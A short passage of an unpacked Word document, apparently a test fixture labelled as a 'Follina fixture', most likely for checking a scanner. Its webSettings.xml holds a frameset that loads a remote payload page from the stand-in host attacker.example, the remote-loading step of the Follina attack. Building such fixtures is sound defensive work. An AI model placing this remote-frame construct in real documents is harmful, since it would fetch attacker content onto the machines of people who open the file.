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v1.18.0 Follina fixture</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/webSettings.xml><?xml version="1.0" encoding="utf-8"?>
<w:webSettings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:frameset>
    <w:frame w:src="https://attacker.example/payload.htm"/>
  </w:frameset>
</w:webSettings>
</file>